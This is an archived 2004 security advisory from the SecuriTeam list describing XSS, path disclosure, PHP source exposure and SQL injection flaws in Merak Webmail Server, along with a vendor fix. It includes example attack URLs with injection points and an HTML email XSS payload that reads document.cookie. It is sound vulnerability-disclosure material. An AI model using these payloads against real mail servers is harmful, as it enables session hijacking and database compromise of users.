Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Merak Webmail Server Multiple Vulnerabilities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Merak Webmail Server Multiple Vulnerabilities
Date: 19 Aug 2004 11:32:20 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Merak Webmail Server Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://www.merakmailserver.com/Products/Webmail_Server_Software/> Merak 
Webmail Server Software "provides users with the ability to access their 
email via a browser using an 'Outlook 2002 or 2003' style interface as 
well as many others, or via their Wireless WAP-enabled device". The Merak 
Webmail Server has been found to contain multiple vulnerabilities ranging 
from Cross-Site Scripting issues, Full path disclosure, exposure of PHP 
files, to SQL-Injections.

DETAILS

Vulnerable Systems:
 * Merak Mail Server version 7.5.1 and prior

Immune Systems:
 * Merak Mail Server version 7.5.2 or newer

Cross-Site Scripting:
There are many input validation holes in the Merak Webmail server. An 
attacker can perform using these holes an XSS attack.

Examples:
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=">[XSS]&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/readmail.html?id=[id]&folder=">[XSS]

The next files (attachment.html, calendar.html), can be accessed without 
knowing user's session ID number, making it easier to use them for 
exploitation:
/attachment.html?attachmentpage_text_error=">[XSS]
/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=">[XSS]
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8

It is possible to inject a XSS in messages.

Example:
Open your mail and write a new message of the sorts of:
< IMG alt="" hspace=0 src="javascript:alert(document.cookie)" 
align=baseline border=0>< IFRAME src="http://www.google.com";></body> 
</html> </IFRAME>

Click on the HTML message checkbox (in order to send it in HTML format).

The XSS will be executed on your browser. If you send the message, the XSS 
will be also executed once the victim reads the email.

Full Path Disclosure
Some variables of adress.html can cause that a remote user may be able to 
determine the installation path.

Example:
Accessing the following URL: 
/mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=,
 will return:

Warning: reset(): Passed variable is not an array or object in C:\Archivos 
de programa\Merak\html\mail\address.html on line 565

Warning: Variable passed to each() is not an array or object in 
C:\Archivos de programa\Merak\html\mail\address.html on line 566

Warning: reset(): Passed variable is not an array or object in C:\Archivos 
de programa\Merak\html\mail\inc\function.address.php on line 100

Warning: Variable passed to each() is not an array or object in 
C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line 
101

Another example is to access the following URL: 
/calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs,
 which will return:

Warning: mktime(): Windows does not support negative values for this 
function in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 413

Warning: date(): Windows does not support dates prior to midnight 
(00:00:00), January 1, 1970 in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 413

Warning: mktime(): Windows does not support negative values for this 
function in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 417

Warning: mktime(): Windows does not support negative values for this 
function in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 420

Warning: date(): Windows does not support dates prior to midnight 
(00:00:00), January 1, 1970 in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 420

Warning: date(): Windows does not support dates prior to midnight 
(00:00:00), January 1, 1970 in C:\Archivos de 
programa\Merak\html\mail\inc\function.calendar.php on line 350

Exposure of PHP Files:
The server allows a remote user to download any PHP file from the server. 
Normally web servers will execute the content found in the PHP file 
instead of allow their download.

Examples:
http://localhost:32000/mail/inc/function.php
http://localhost:32000/mail/inc/function.view.php

SQL Injection:
There are numerous SQL Injection vulnerabilities in the calendar.html. 
These SQL injection vulnerabilities allow a remote user to inject 
arbitrary SQL commands.

Examples:
/calendar.html?id=1'&schedule=[SQL]
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'

Disclosure Timeline:
Vendor Contacted: Wed, 04 Aug 2004
Thu, 12 Aug 2004: Release of Merak Mail Server 7.5.2

Solution:
Download the new release available at:  
<http://www.MerakMailServer.com/Download/> 
http://www.MerakMailServer.com/Download/.


ADDITIONAL INFORMATION

The information has been provided by Criolabs staff.
The original article can be found at:  
<http://www.criolabs.net/advisories/Merak.txt> 
http://www.criolabs.net/advisories/Merak.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Merak Webmail Server Multiple Vulnerabilities, SecuriTeam <=
Previous by Date:  [NEWS] Cisco IOS Malformed OSPF Packet Causes Reload, SecuriTeam
Next by Date:  [UNIX] PHP-FUSION Various Vulnerabilities, SecuriTeam
Previous by Thread:  [NEWS] Cisco IOS Malformed OSPF Packet Causes Reload, SecuriTeam
Next by Thread:  [UNIX] PHP-FUSION Various Vulnerabilities, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]